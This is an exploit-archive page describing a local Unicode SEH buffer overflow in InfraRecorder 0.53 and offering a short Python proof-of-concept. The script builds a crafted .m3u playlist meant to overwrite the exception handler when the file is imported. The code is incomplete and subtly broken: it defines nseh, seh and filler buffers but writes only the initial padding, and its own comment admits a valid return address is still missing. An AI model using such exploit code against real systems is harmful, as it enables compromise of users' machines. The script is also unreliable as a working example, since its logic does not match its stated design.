InfraRecorder 0.53 Unicode Buffer Overflow

2014.04.26

Credit: Osanda Malith

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-119

#!/usr/bin/python
# Exploit Title: InfraRecorder Unicode Buffer Overflow
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows XP sp2
# Exploit Author: Osanda Malith
'''
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
you can build a successful exploit.
'''
'''
Click Edit -> Import -> import our buffer
'''
junk = "A"*262
nseh = "BB"
seh = "CC"
junk2 = "D"*20000
file=open("Exploit.m3u","w")
file.write(junk)
file.close()
#EOF

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

InfraRecorder 0.53 Unicode Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.